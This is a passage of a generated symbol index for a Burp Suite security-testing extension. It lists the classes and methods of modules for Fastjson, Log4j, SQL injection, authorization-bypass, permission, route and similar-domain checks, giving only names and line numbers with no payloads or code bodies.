│ └── utils/
│ ├── CustomScanIssue.java
│ ├── DbUtils.java
│ ├── ExpressionUtils.java
│ ├── I18nUtils.java
│ ├── JsonProcessorUtil.java
│ ├── JsonUtils.java
│ ├── Nuclei.java
│ ├── ResponseSimilarityMatcher.java
│ ├── RobotInput.java
│ ├── SmartRequestDetector.java
│ ├── UrlCacheUtil.java
│ └── Utils.java
└── resources/
└── logback.xml
SYMBOL INDEX (789 symbols across 67 files)
FILE: src/main/java/burp/BurpExtender.java
class BurpExtender (line 17) | public class BurpExtender implements IBurpExtender, IContextMenuFactory,...
method registerExtenderCallbacks (line 18) | @Override
method createMenuItems (line 41) | @Override
method processHttpMessage (line 111) | @Override
FILE: src/main/java/burp/bean/AuthBean.java
class AuthBean (line 3) | public class AuthBean {
method AuthBean (line 8) | public AuthBean() {
method AuthBean (line 11) | public AuthBean(String method, String path, String headers) {
method getMethod (line 17) | public String getMethod() {
method setMethod (line 21) | public void setMethod(String method) {
method getPath (line 25) | public String getPath() {
method setPath (line 29) | public void setPath(String path) {
method getHeaders (line 33) | public String getHeaders() {
method setHeaders (line 37) | public void setHeaders(String headers) {
FILE: src/main/java/burp/bean/ConfigBean.java
class ConfigBean (line 3) | public class ConfigBean {
method ConfigBean (line 9) | public ConfigBean() {
method ConfigBean (line 12) | public ConfigBean(String module, String type, String value) {
method getId (line 18) | public Integer getId() {
method setId (line 22) | public void setId(Integer id) {
method getModule (line 26) | public String getModule() {
method setModule (line 30) | public void setModule(String module) {
method getType (line 34) | public String getType() {
method setType (line 38) | public void setType(String type) {
method getValue (line 42) | public String getValue() {
method setValue (line 46) | public void setValue(String value) {
FILE: src/main/java/burp/bean/FastjsonBean.java
class FastjsonBean (line 3) | public class FastjsonBean {
method FastjsonBean (line 8) | public FastjsonBean() {
method FastjsonBean (line 11) | public FastjsonBean(String type, String value) {
method getId (line 16) | public Integer getId() {
method setId (line 20) | public void setId(Integer id) {
method getType (line 24) | public String getType() {
method setType (line 28) | public void setType(String type) {
method getValue (line 32) | public String getValue() {
method setValue (line 36) | public void setValue(String value) {
FILE: src/main/java/burp/bean/Log4jBean.java
class Log4jBean (line 3) | public class Log4jBean {
method Log4jBean (line 8) | public Log4jBean() {
method Log4jBean (line 11) | public Log4jBean(String type, String value) {
method Log4jBean (line 16) | public Log4jBean(Integer id, String type, String value) {
method getId (line 22) | public Integer getId() {
method setId (line 26) | public void setId(Integer id) {
method getType (line 30) | public String getType() {
method setType (line 34) | public void setType(String type) {
method getValue (line 38) | public String getValue() {
method setValue (line 42) | public void setValue(String value) {
FILE: src/main/java/burp/bean/NucleiBean.java
class NucleiBean (line 3) | public class NucleiBean {
method NucleiBean (line 17) | public NucleiBean() {
method getId (line 20) | public String getId() {
method setId (line 24) | public void setId(String id) {
method getName (line 28) | public String getName() {
method setName (line 32) | public void setName(String name) {
method getAuthor (line 36) | public String getAuthor() {
method setAuthor (line 40) | public void setAuthor(String author) {
method getSeverity (line 44) | public String getSeverity() {
method setSeverity (line 48) | public void setSeverity(String severity) {
method getDescription (line 52) | public String getDescription() {
method setDescription (line 56) | public void setDescription(String description) {
method getReference (line 60) | public String getReference() {
method setReference (line 64) | public void setReference(String reference) {
method getTags (line 68) | public String getTags() {
method setTags (line 72) | public void setTags(String tags) {
method getMethod (line 76) | public String getMethod() {
method setMethod (line 80) | public void setMethod(String method) {
method getPath (line 84) | public String getPath() {
method setPath (line 88) | public void setPath(String path) {
method getHeader (line 92) | public String getHeader() {
method setHeader (line 96) | public void setHeader(String header) {
method getDsl (line 100) | public String getDsl() {
method setDsl (line 104) | public void setDsl(String dsl) {
method getRaw (line 108) | public String getRaw() {
method setRaw (line 112) | public void setRaw(String raw) {
FILE: src/main/java/burp/bean/PermBean.java
class PermBean (line 7) | public class PermBean {
method PermBean (line 12) | public PermBean() {
method PermBean (line 15) | public PermBean(String type, String value) {
method getId (line 20) | public int getId() {
method setId (line 24) | public void setId(int id) {
method getType (line 28) | public String getType() {
method setType (line 32) | public void setType(String type) {
method getValue (line 36) | public String getValue() {
method setValue (line 40) | public void setValue(String value) {
FILE: src/main/java/burp/bean/RouteBean.java
class RouteBean (line 3) | public class RouteBean {
method RouteBean (line 10) | public RouteBean() {
method RouteBean (line 13) | public RouteBean(int id, int enable, String name, String path, String ...
method getId (line 21) | public int getId() {
method setId (line 25) | public void setId(int id) {
method getEnable (line 29) | public int getEnable() {
method setEnable (line 33) | public void setEnable(int enable) {
method getName (line 37) | public String getName() {
method setName (line 41) | public void setName(String name) {
method getPath (line 45) | public String getPath() {
method setPath (line 49) | public void setPath(String path) {
method getExpress (line 53) | public String getExpress() {
method setExpress (line 57) | public void setExpress(String express) {
FILE: src/main/java/burp/bean/SimilarDomainConfigBean.java
class SimilarDomainConfigBean (line 3) | public class SimilarDomainConfigBean {
method SimilarDomainConfigBean (line 9) | public SimilarDomainConfigBean() {
method SimilarDomainConfigBean (line 12) | public SimilarDomainConfigBean(int projectId, String domain) {
method getId (line 17) | public int getId() {
method setId (line 21) | public void setId(int id) {
method getProjectId (line 25) | public int getProjectId() {
method setProjectId (line 29) | public void setProjectId(int projectId) {
method getDomain (line 33) | public String getDomain() {
method setDomain (line 37) | public void setDomain(String domain) {
method getCreateTime (line 41) | public String getCreateTime() {
method setCreateTime (line 45) | public void setCreateTime(String createTime) {
FILE: src/main/java/burp/bean/SimilarDomainResultBean.java
class SimilarDomainResultBean (line 3) | public class SimilarDomainResultBean {
method SimilarDomainResultBean (line 10) | public SimilarDomainResultBean() {
method SimilarDomainResultBean (line 13) | public SimilarDomainResultBean(int projectId, String domain, String ip) {
method getId (line 19) | public int getId() {
method setId (line 23) | public void setId(int id) {
method getProjectId (line 27) | public int getProjectId() {
method setProjectId (line 31) | public void setProjectId(int projectId) {
method getDomain (line 35) | public String getDomain() {
method setDomain (line 39) | public void setDomain(String domain) {
method getIp (line 43) | public String getIp() {
method setIp (line 47) | public void setIp(String ip) {
method getCreateTime (line 51) | public String getCreateTime() {
method setCreateTime (line 55) | public void setCreateTime(String createTime) {
FILE: src/main/java/burp/bean/SimilarProjectBean.java
class SimilarProjectBean (line 3) | public class SimilarProjectBean {
method SimilarProjectBean (line 8) | public SimilarProjectBean() {
method SimilarProjectBean (line 11) | public SimilarProjectBean(String name) {
method getId (line 15) | public int getId() {
method setId (line 19) | public void setId(int id) {
method getName (line 23) | public String getName() {
method setName (line 27) | public void setName(String name) {
method getCreateTime (line 31) | public String getCreateTime() {
method setCreateTime (line 35) | public void setCreateTime(String createTime) {
FILE: src/main/java/burp/bean/SimilarUrlResultBean.java
class SimilarUrlResultBean (line 3) | public class SimilarUrlResultBean {
method SimilarUrlResultBean (line 9) | public SimilarUrlResultBean() {
method SimilarUrlResultBean (line 12) | public SimilarUrlResultBean(int projectId, String url) {
method getId (line 17) | public int getId() {
method setId (line 21) | public void setId(int id) {
method getProjectId (line 25) | public int getProjectId() {
method setProjectId (line 29) | public void setProjectId(int projectId) {
method getUrl (line 33) | public String getUrl() {
method setUrl (line 37) | public void setUrl(String url) {
method getCreateTime (line 41) | public String getCreateTime() {
method setCreateTime (line 45) | public void setCreateTime(String createTime) {
FILE: src/main/java/burp/bean/SqlBean.java
class SqlBean (line 3) | public class SqlBean {
method SqlBean (line 8) | public SqlBean() {
method SqlBean (line 11) | public SqlBean(String type, String value) {
method getId (line 16) | public int getId() {
method setId (line 20) | public void setId(int id) {
method getType (line 24) | public String getType() {
method setType (line 28) | public void setType(String type) {
method getValue (line 32) | public String getValue() {
method setValue (line 36) | public void setValue(String value) {
FILE: src/main/java/burp/dao/ConfigDao.java
class ConfigDao (line 15) | public class ConfigDao {
method getConfig (line 17) | public static ConfigBean getConfig(String module, String type) {
method deleteConfig (line 45) | public static void deleteConfig(String type) {
method deleteToolConfig (line 66) | public static void deleteToolConfig(String type) {
method updateConfig (line 87) | public static void updateConfig(ConfigBean config) {
method saveConfig (line 110) | public static void saveConfig(ConfigBean config) {
method getToolConfig (line 134) | public static List<ConfigBean> getToolConfig() {
FILE: src/main/java/burp/dao/FastjsonDao.java
class FastjsonDao (line 14) | public class FastjsonDao {
method getFastjsonListsByType (line 15) | public static List<FastjsonBean> getFastjsonListsByType(String type) {
FILE: src/main/java/burp/dao/Log4jDao.java
class Log4jDao (line 14) | public class Log4jDao {
method getLog4jListsByType (line 16) | public static List<Log4jBean> getLog4jListsByType(String type) {
method getLog4jListByType (line 46) | public static Log4jBean getLog4jListByType(String type) {
method saveLog4j (line 75) | public static void saveLog4j(Log4jBean log4jBean) {
method updateLog4j (line 96) | public static void updateLog4j(Log4jBean log4jBean) {
method deleteLog4jByType (line 117) | public static void deleteLog4jByType(String type) {
FILE: src/main/java/burp/dao/PermDao.java
class PermDao (line 18) | public class PermDao {
method savePerm (line 20) | public static void savePerm(PermBean permBean){
method updatePerm (line 42) | public static void updatePerm(PermBean permBean){
method deletePerm (line 63) | public static void deletePerm(String type){
method getPermListByType (line 84) | public static PermBean getPermListByType(String type) {
method getPermListsByType (line 113) | public static List<PermBean> getPermListsByType(String type){
FILE: src/main/java/burp/dao/RouteDao.java
class RouteDao (line 15) | public class RouteDao {
method getRouteLists (line 17) | public static List<RouteBean> getRouteLists(){
method updateRouteById (line 47) | public static void updateRouteById(RouteBean routeBean){
method updateRouteEnable (line 71) | public static void updateRouteEnable(RouteBean routeBean){
method deleteRoute (line 95) | public static boolean deleteRoute(RouteBean routeBean){
method addRoute (line 120) | public static void addRoute(RouteBean routeBean){
FILE: src/main/java/burp/dao/SimilarDomainConfigDao.java
class SimilarDomainConfigDao (line 14) | public class SimilarDomainConfigDao {
method saveDomainConfig (line 16) | public static void saveDomainConfig(SimilarDomainConfigBean config) {
method saveDomainConfigs (line 34) | public static void saveDomainConfigs(int projectId, List<String> domai...
method getDomainConfigs (line 79) | public static List<String> getDomainConfigs(int projectId) {
FILE: src/main/java/burp/dao/SimilarDomainResultDao.java
class SimilarDomainResultDao (line 14) | public class SimilarDomainResultDao {
method saveDomainResult (line 16) | public static int saveDomainResult(SimilarDomainResultBean result) {
method getDomainResults (line 74) | public static List<SimilarDomainResultBean> getDomainResults(int proje...
method isDomainExists (line 105) | public static boolean isDomainExists(int id, String domain) {
method updateDomainResult (line 122) | public static void updateDomainResult(SimilarDomainResultBean result) {
FILE: src/main/java/burp/dao/SimilarProjectDao.java
class SimilarProjectDao (line 13) | public class SimilarProjectDao {
method saveProject (line 15) | public static void saveProject(SimilarProjectBean project) {
method getAllProjects (line 32) | public static List<SimilarProjectBean> getAllProjects() {
method deleteProject (line 58) | public static void deleteProject(int projectId) {
FILE: src/main/java/burp/dao/SimilarUrlResultDao.java
class SimilarUrlResultDao (line 15) | public class SimilarUrlResultDao {
method saveUrlResult (line 17) | public static int saveUrlResult(SimilarUrlResultBean result) {
method getUrlResults (line 70) | public static List<SimilarUrlResultBean> getUrlResults(int projectId) {
method isUrlExists (line 104) | public static boolean isUrlExists(int projectId, String url) {
FILE: src/main/java/burp/dao/SqlDao.java
class SqlDao (line 14) | public class SqlDao {
method saveSql (line 17) | public static void saveSql(SqlBean sqlBean){
method updateSql (line 38) | public static void updateSql(SqlBean sqlBean){
method getSqlListsByType (line 60) | public static List<SqlBean> getSqlListsByType(String type){
method getSqlListByType (line 90) | public static SqlBean getSqlListByType(String type){
method deleteSqlByType (line 121) | public static void deleteSqlByType(String type){
method deleteSqlByTypeAndValue (line 141) | public static void deleteSqlByTypeAndValue(String type, String value){
FILE: src/main/java/burp/menu/AuthMenu.java
class AuthMenu (line 9) | public class AuthMenu extends JMenuItem {
method AuthMenu (line 10) | public AuthMenu(IHttpRequestResponse[] requestResponses) {
FILE: src/main/java/burp/menu/FastjsonMenu.java
class FastjsonMenu (line 9) | public class FastjsonMenu extends JMenuItem {
method FastjsonDnslogMenu (line 10) | public JMenuItem FastjsonDnslogMenu(IHttpRequestResponse[] responses) {
method FastjsonEchoMenu (line 27) | public JMenuItem FastjsonEchoMenu(IHttpRequestResponse[] responses) {
method FastjsonJNDIMenu (line 44) | public JMenuItem FastjsonJNDIMenu(IHttpRequestResponse[] responses) {
method FastjsonVersionMenu (line 61) | public JMenuItem FastjsonVersionMenu(IHttpRequestResponse[] responses) {
FILE: src/main/java/burp/menu/Log4jMenu.java
class Log4jMenu (line 9) | public class Log4jMenu extends JMenuItem {
method Log4jMenu (line 10) | public Log4jMenu(IHttpRequestResponse[] requestResponses) {
FILE: src/main/java/burp/menu/NucleiMenu.java
class NucleiMenu (line 9) | public class NucleiMenu extends JMenuItem {
method NucleiMenu (line 10) | public NucleiMenu(IHttpRequestResponse[] requestResponses) {
FILE: src/main/java/burp/menu/PermMenu.java
class PermMenu (line 9) | public class PermMenu extends JMenuItem {
method PermMenu (line 10) | public PermMenu(IHttpRequestResponse[] requestResponses) {
FILE: src/main/java/burp/menu/RouteMenu.java
class RouteMenu (line 10) | public class RouteMenu extends JMenuItem {
method RouteMenu (line 11) | public RouteMenu(IHttpRequestResponse[] requestResponses) {
FILE: src/main/java/burp/menu/SqlMenu.java
class SqlMenu (line 9) | public class SqlMenu extends JMenuItem {
method SqlMenu (line 10) | public SqlMenu(IHttpRequestResponse[] requestResponses) {
FILE: src/main/java/burp/menu/TextProcessMenu.java
class TextProcessMenu (line 21) | public class TextProcessMenu extends JMenu {
method TextProcessMenu (line 26) | public TextProcessMenu(IContextMenuInvocation invocation) {
method initMenu (line 35) | private void initMenu() {
method processSelectedText (line 72) | private void processSelectedText(TextProcessor processor) {
method showProcessedResult (line 118) | private void showProcessedResult(String result) {
method urlDecode (line 155) | private String urlDecode(String text) {
method unicodeDecode (line 169) | private String unicodeDecode(String text) {
method splitKeyword (line 191) | private String splitKeyword(String text) {
method randomCase (line 210) | private String randomCase(String text) {
method getRandomString (line 225) | private String getRandomString(int number) {
method dirtyGetRandomString (line 238) | private void dirtyGetRandomString() {
method checkBase64Data (line 259) | private void checkBase64Data() {
type TextProcessor (line 269) | @FunctionalInterface
method process (line 271) | String process(String text);
FILE: src/main/java/burp/ui/AuthUI.java
class AuthUI (line 27) | public class AuthUI implements UIHandler, IMessageEditorController {
method getHttpService (line 43) | @Override
method getRequest (line 48) | @Override
method getResponse (line 53) | @Override
method init (line 58) | @Override
method setupData (line 65) | private void setupData() {
method setupUI (line 90) | private void setupUI() {
method getPanel (line 142) | @Override
method getTabName (line 147) | @Override
method Check (line 153) | public static void Check(IHttpRequestResponse[] requestResponses) {
method add (line 227) | private static void add(String method, String url, String statuscode, ...
method suffix (line 236) | public static List<AuthBean> suffix(String method, String path) {
method prefix (line 268) | public static List<AuthBean> prefix(String method, String path) {
method forgeHeaders (line 301) | public static List<AuthBean> forgeHeaders(String method, String url) {
method changeAccept (line 324) | public static void changeAccept(List<String> headers, byte[] body, Str...
class AuthEntry (line 337) | private static class AuthEntry {
method AuthEntry (line 346) | public AuthEntry(int id, String method, String url, String status, S...
class AuthModel (line 357) | private static class AuthModel extends AbstractTableModel {
method getRowCount (line 359) | @Override
method getColumnCount (line 364) | @Override
method getValueAt (line 369) | @Override
method getColumnName (line 387) | @Override
class URLTable (line 407) | private class URLTable extends JTable {
method URLTable (line 408) | public URLTable(TableModel dm) {
method changeSelection (line 415) | @Override
FILE: src/main/java/burp/ui/ConfigUI.java
class ConfigUI (line 22) | public class ConfigUI implements UIHandler {
method setupUI (line 49) | private void setupUI() {
method setupData (line 201) | private void setupData() {
method addData (line 332) | public void addData(String key, String value) {
method init (line 340) | @Override
method getPanel (line 346) | @Override
method getTabName (line 351) | @Override
class ConfigModel (line 357) | static class ConfigModel extends AbstractTableModel {
method getRowCount (line 359) | @Override
method getColumnCount (line 364) | @Override
method getValueAt (line 369) | @Override
method getColumnName (line 384) | @Override
class LogEntry (line 400) | public static class LogEntry {
method LogEntry (line 405) | public LogEntry(int id, String key, String value) {
method LogEntry (line 411) | public LogEntry(String key, String value) {
FILE: src/main/java/burp/ui/FastjsonUI.java
class FastjsonUI (line 34) | public class FastjsonUI implements UIHandler, IMessageEditorController ,...
method resetAllCaches (line 58) | public static void resetAllCaches() {
method getHttpService (line 62) | @Override
method getRequest (line 67) | @Override
method getResponse (line 72) | @Override
method init (line 77) | @Override
method setupData (line 93) | private void setupData() {
method refreshTable (line 128) | private static void refreshTable() {
method setupUI (line 137) | private void setupUI() {
method getPanel (line 201) | @Override
method getTabName (line 206) | @Override
method CheckDnslog (line 211) | public void CheckDnslog(IHttpRequestResponse[] responses) {
method CheckEchoVul (line 241) | public void CheckEchoVul(IHttpRequestResponse[] responses) {
method CheckJNDIVul (line 295) | public void CheckJNDIVul(IHttpRequestResponse[] responses) {
method CheckVersion (line 345) | public void CheckVersion(IHttpRequestResponse[] responses) {
method add (line 368) | private static void add(String extensionMethod, String url, String sta...
method setAutoRefresh (line 378) | public static void setAutoRefresh(boolean value) {
method processHttpMessage (line 384) | @Override
method performPassiveScan (line 432) | private void performPassiveScan(IHttpRequestResponse baseRequestRespon...
class FastjsonModel (line 461) | private static class FastjsonModel extends AbstractTableModel {
method getRowCount (line 463) | @Override
method getColumnCount (line 470) | @Override
method getValueAt (line 475) | @Override
method getColumnName (line 494) | @Override
class FastjsonEntry (line 517) | private static class FastjsonEntry {
method FastjsonEntry (line 528) | private FastjsonEntry(int id, String extensionMethod, String url, St...
class URLTable (line 539) | private class URLTable extends JTable {
method URLTable (line 540) | public URLTable(TableModel tableModel) {
method changeSelection (line 547) | @Override
FILE: src/main/java/burp/ui/Log4jUI.java
class Log4jUI (line 32) | public class Log4jUI implements UIHandler, IMessageEditorController, IHt...
method resetAllCaches (line 72) | public static void resetAllCaches() {
method processHttpMessage (line 79) | @Override
method getHttpService (line 94) | @Override
method getRequest (line 99) | @Override
method getResponse (line 104) | @Override
method init (line 109) | @Override
method setupData (line 127) | private void setupData() {
method setupUI (line 310) | private void setupUI() {
method getPanel (line 486) | @Override
method getTabName (line 491) | @Override
method add (line 496) | public static void add(String extensionMethod, String url, String stat...
method getReqTag (line 506) | private static String getReqTag(IHttpRequestResponse baseRequestRespon...
method Check (line 529) | public static void Check(IHttpRequestResponse[] messageInfo, boolean i...
class Log4jModel (line 742) | static class Log4jModel extends AbstractTableModel {
method getRowCount (line 744) | @Override
method getColumnCount (line 749) | @Override
method getColumnName (line 754) | @Override
method getValueAt (line 772) | @Override
method getColumnClass (line 791) | @Override
class Log4jEntry (line 800) | public static class Log4jEntry {
method Log4jEntry (line 809) | public Log4jEntry(int id, String extensionMethod, String url, String...
class URLTable (line 819) | class URLTable extends JTable {
method URLTable (line 820) | public URLTable(TableModel tableModel) {
method changeSelection (line 828) | @Override
FILE: src/main/java/burp/ui/MainUI.java
class MainUI (line 14) | public class MainUI extends JPanel implements ITab {
method MainUI (line 20) | public MainUI(IBurpExtenderCallbacks callbacks) {
method init (line 35) | public static List<String> init() {
method getTabCaption (line 50) | @Override
method getUiComponent (line 55) | @Override
FILE: src/main/java/burp/ui/PermUI.java
class PermUI (line 31) | public class PermUI implements UIHandler, IMessageEditorController, IHtt...
method resetAllCaches (line 62) | public static void resetAllCaches() {
method processHttpMessage (line 68) | @Override
method getHttpService (line 83) | @Override
method getRequest (line 88) | @Override
method getResponse (line 93) | @Override
method init (line 98) | @Override
method getPanel (line 105) | @Override
method getTabName (line 110) | @Override
method setupData (line 116) | private void setupData() {
method exportTableToClipboard (line 257) | private void exportTableToClipboard() {
method setupUI (line 287) | private void setupUI() {
method Check (line 473) | public static void Check(IHttpRequestResponse[] responses, boolean isS...
method add (line 639) | private static void add(String method, String url, String originalengt...
class PermModel (line 648) | static class PermModel extends AbstractTableModel {
method getRowCount (line 650) | @Override
method getColumnCount (line 655) | @Override
method getValueAt (line 660) | @Override
method getColumnName (line 682) | @Override
method getColumnClass (line 704) | @Override
class PermEntry (line 714) | private static class PermEntry {
method PermEntry (line 726) | public PermEntry(int id, String method, String url, String originale...
class URLTable (line 741) | private class URLTable extends JTable {
method URLTable (line 742) | public URLTable(TableModel tableModel) {
method changeSelection (line 748) | @Override
FILE: src/main/java/burp/ui/RouteUI.java
class RouteUI (line 26) | public class RouteUI implements UIHandler, IMessageEditorController, IHt...
method resetAllCaches (line 58) | public static void resetAllCaches() {
method processHttpMessage (line 65) | @Override
method getHttpService (line 80) | @Override
method getRequest (line 85) | @Override
method getResponse (line 90) | @Override
method init (line 95) | @Override
method setupData (line 106) | private void setupData() {
method setupUI (line 229) | private void setupUI() {
method getPanel (line 325) | @Override
method getTabName (line 331) | @Override
method Check (line 337) | public static void Check(IHttpRequestResponse[] responses, boolean isS...
method sendRequestWithSmartDetect (line 412) | private static IHttpRequestResponse sendRequestWithSmartDetect(IHttpSe...
method generateTestPaths (line 417) | private static List<String> generateTestPaths(String originalPath, Str...
method cleanPath (line 447) | private static String cleanPath(String path) {
method cleanSegment (line 455) | private static String cleanSegment(String segment) {
method buildNewRequest (line 463) | private static byte[] buildNewRequest(
method sendRequest (line 496) | private static IHttpRequestResponse sendRequest(IHttpService httpServi...
method processResponse (line 505) | private static void processResponse(
method append (line 540) | public static List<String> append(String basePath, String stringToAppe...
method generateIssueKey (line 564) | private static String generateIssueKey(String name, String url, String...
method addIssus (line 568) | public static void addIssus(String name, String url, String Status, IH...
class RouteIssusModel (line 580) | static class RouteIssusModel extends AbstractTableModel {
method getRowCount (line 582) | @Override
method getColumnCount (line 587) | @Override
method getValueAt (line 592) | @Override
method getColumnName (line 609) | @Override
class RouteIssusEntry (line 628) | private static class RouteIssusEntry {
method RouteIssusEntry (line 635) | public RouteIssusEntry(int id, String issueName, String url, String ...
class RouteIssusTable (line 644) | private class RouteIssusTable extends JTable {
method RouteIssusTable (line 645) | public RouteIssusTable(TableModel tableModel) {
method changeSelection (line 654) | @Override
class RouteEntry (line 669) | public static class RouteEntry {
method RouteEntry (line 676) | public RouteEntry(int id, int enable, String name, String path, Stri...
class RouteModel (line 685) | static class RouteModel extends AbstractTableModel {
method getRowCount (line 687) | @Override
method getColumnCount (line 692) | @Override
method getValueAt (line 697) | @Override
method getColumnName (line 716) | @Override
class RouteTable (line 737) | private class RouteTable extends JTable {
method RouteTable (line 738) | public RouteTable(TableModel tableModel) {
method getCellRenderer (line 747) | @Override
class CustomTableCellRenderer (line 754) | private static class CustomTableCellRenderer extends DefaultTableCellR...
method getTableCellRendererComponent (line 755) | @Override
FILE: src/main/java/burp/ui/SimilarHelper/CacheManager.java
class CacheManager (line 11) | public class CacheManager {
method cacheIP (line 30) | public static void cacheIP(String domain, String ip) {
method getCachedIP (line 38) | public static String getCachedIP(String domain) {
method cacheProjectDomain (line 59) | public static void cacheProjectDomain(int projectId, String domain) {
method isProjectDomainCached (line 67) | public static boolean isProjectDomainCached(int projectId, String doma...
method cacheProjectUrl (line 75) | public static void cacheProjectUrl(int projectId, String url) {
method isProjectUrlCached (line 83) | public static boolean isProjectUrlCached(int projectId, String url) {
method clearProjectCache (line 91) | public static void clearProjectCache(int projectId) {
method clearAllCache (line 99) | public static void clearAllCache() {
method getCacheStats (line 109) | public static Map<String, Integer> getCacheStats() {
method getProjectCacheStats (line 133) | public static Map<String, Integer> getProjectCacheStats(int projectId) {
method cleanExpiredIPCache (line 148) | public static void cleanExpiredIPCache() {
method needsIPRefresh (line 167) | public static boolean needsIPRefresh(String domain) {
FILE: src/main/java/burp/ui/SimilarHelper/TableRenderer.java
class TableRenderer (line 7) | public class TableRenderer extends DefaultTableCellRenderer {
method getTableCellRendererComponent (line 11) | @Override
FILE: src/main/java/burp/ui/SimilarHelper/ThreadManager.java
class ThreadManager (line 9) | public class ThreadManager {
method newThread (line 22) | @Override
method execute (line 33) | public static void execute(Runnable task) {
method submit (line 44) | public static <T> Future<T> submit(Callable<T> task) {
method shutdown (line 56) | public static void shutdown() {
FILE: src/main/java/burp/ui/SimilarHelper/bean/Domain.java
class Domain (line 9) | public class Domain {
method Domain (line 16) | public Domain(String domain, String ip) {
method Domain (line 24) | public Domain(SimilarDomainResultBean bean) {
method formatTimestamp (line 31) | private String formatTimestamp(String timestamp) {
method getId (line 38) | public int getId() {
method setId (line 42) | public void setId(int id) {
method getDomain (line 46) | public String getDomain() {
method getIp (line 50) | public String getIp() {
method getTimestamp (line 54) | public String getTimestamp() {
method equals (line 58) | @Override
method hashCode (line 66) | @Override
FILE: src/main/java/burp/ui/SimilarHelper/bean/Project.java
class Project (line 9) | public class Project {
method Project (line 17) | public Project(SimilarProjectBean bean) {
method getId (line 23) | public int getId() {
method getName (line 27) | public String getName() {
method getMainDomains (line 31) | public List<String> getMainDomains() {
method setMainDomains (line 35) | public void setMainDomains(List<String> domains) {
method getDomainEntries (line 41) | public List<Domain> getDomainEntries() {
method getUrlEntries (line 45) | public List<URL> getUrlEntries() {
method addDomainEntry (line 49) | public void addDomainEntry(Domain entry) {
method addUrlEntry (line 55) | public void addUrlEntry(URL entry) {
method toString (line 61) | @Override
FILE: src/main/java/burp/ui/SimilarHelper/bean/URL.java
class URL (line 6) | public class URL {
method URL (line 12) | public URL(String url) {
method getId (line 18) | public int getId() {
method getUrl (line 22) | public String getUrl() {
method getTimestamp (line 26) | public String getTimestamp() {
FILE: src/main/java/burp/ui/SimilarHelper/dialog/DomainConfigDialog.java
class DomainConfigDialog (line 11) | public class DomainConfigDialog extends JDialog {
method DomainConfigDialog (line 16) | public DomainConfigDialog(Window owner, Project project) {
method initializeUI (line 25) | private void initializeUI() {
method loadDomains (line 68) | private void loadDomains() {
method showAddDomainDialog (line 76) | private void showAddDomainDialog() {
method showEditDomainDialog (line 95) | private void showEditDomainDialog() {
method deleteDomain (line 122) | private void deleteDomain() {
method saveDomains (line 139) | private void saveDomains() {
FILE: src/main/java/burp/ui/SimilarHelper/dialog/ProjectManageDialog.java
class ProjectManageDialog (line 15) | public class ProjectManageDialog extends JDialog {
method ProjectManageDialog (line 22) | public ProjectManageDialog(Window owner, List<Project> projects, Consu...
method initializeUI (line 32) | private void initializeUI() {
method selectProject (line 69) | private void selectProject() {
method showAddProjectDialog (line 86) | private void showAddProjectDialog() {
method deleteSelectedProject (line 105) | private void deleteSelectedProject() {
method refreshProjectList (line 130) | private void refreshProjectList() {
FILE: src/main/java/burp/ui/SimilarHelper/table/DomainTable.java
class DomainTable (line 22) | public class DomainTable extends JTable {
method DomainTable (line 37) | public DomainTable() {
method initializeTable (line 58) | private void initializeTable() {
method setupKeyboardShortcuts (line 80) | private void setupKeyboardShortcuts() {
method setupContextMenu (line 105) | private void setupContextMenu() {
method copySelectedColumn (line 146) | private void copySelectedColumn(int column) {
method copySelectedRows (line 167) | private void copySelectedRows() {
method copyToClipboard (line 193) | private void copyToClipboard(String content) {
method addEntry (line 209) | public void addEntry(Domain entry) {
method refreshEntry (line 238) | public void refreshEntry(Domain entry) {
method clearData (line 263) | public void clearData() {
method startBatchUpdate (line 272) | public void startBatchUpdate() {
method endBatchUpdate (line 281) | public void endBatchUpdate() {
FILE: src/main/java/burp/ui/SimilarHelper/table/URLTable.java
class URLTable (line 26) | public class URLTable extends JTable {
method URLTable (line 46) | public URLTable() {
method initializeTable (line 68) | private void initializeTable() {
method setupContextMenu (line 89) | private void setupContextMenu() {
method handleContextMenu (line 128) | private void handleContextMenu(MouseEvent e) {
method setupKeyboardShortcuts (line 146) | private void setupKeyboardShortcuts() {
method copySelectedUrls (line 163) | private void copySelectedUrls() {
method copyAllUrls (line 181) | private void copyAllUrls() {
method copyToClipboard (line 198) | private void copyToClipboard(String text) {
method addEntry (line 213) | public void addEntry(URL entry) {
method clearData (line 241) | public void clearData() {
method startBatchUpdate (line 250) | public void startBatchUpdate() {
method endBatchUpdate (line 259) | public void endBatchUpdate() {
FILE: src/main/java/burp/ui/SimilarHelper/tablemodel/TableModel.java
class TableModel (line 11) | public class TableModel extends AbstractTableModel {
method TableModel (line 29) | public TableModel(String[] columnNames, int keyColumnIndex) {
method getRowCount (line 36) | @Override
method getColumnCount (line 41) | @Override
method getColumnName (line 46) | @Override
method getValueAt (line 51) | @Override
method setValueAt (line 61) | @Override
method isCellEditable (line 76) | @Override
method addRow (line 86) | public synchronized void addRow(List<Object> rowData, String uniqueKey) {
method findRowByKey (line 112) | private int findRowByKey(String key) {
method startBatchUpdate (line 125) | public synchronized void startBatchUpdate() {
method endBatchUpdate (line 132) | public synchronized void endBatchUpdate() {
method clearData (line 140) | public synchronized void clearData() {
method cleanup (line 150) | public synchronized void cleanup() {
FILE: src/main/java/burp/ui/SimilarUI.java
class SimilarUI (line 41) | public class SimilarUI implements UIHandler, IHttpListener {
method init (line 68) | @Override
method getPanel (line 78) | @Override
method getTabName (line 88) | @Override
method setupUI (line 96) | private void setupUI() {
method createControlPanel (line 111) | private JPanel createControlPanel() {
method createSplitPane (line 136) | private JSplitPane createSplitPane() {
method createStatsPanel (line 160) | private JPanel createStatsPanel() {
method setupControlButtons (line 181) | private void setupControlButtons() {
method handleScanButtonClick (line 190) | private void handleScanButtonClick() {
method handleDomainConfigButtonClick (line 203) | private void handleDomainConfigButtonClick() {
method setScanEnabled (line 222) | public void setScanEnabled(boolean enabled) {
method loadProjects (line 232) | private void loadProjects() {
method showProjectManageDialog (line 249) | private void showProjectManageDialog() {
method processHttpMessage (line 265) | @Override
method processHttpResponse (line 284) | private void processHttpResponse(IHttpRequestResponse messageInfo) {
method processResponseContent (line 306) | private void processResponseContent(IHttpRequestResponse messageInfo, ...
method processLargeResponse (line 330) | private void processLargeResponse(byte[] response, int bodyOffset) thr...
method processExtractedData (line 345) | private void processExtractedData(String content) {
method processNewDomain (line 373) | private void processNewDomain(String domain) {
method isDomainMatch (line 413) | private boolean isDomainMatch(String domain) {
method updateDomainUI (line 428) | private void updateDomainUI(String domain, String ip) {
method saveDomainToDatabase (line 451) | private void saveDomainToDatabase(Domain entry) {
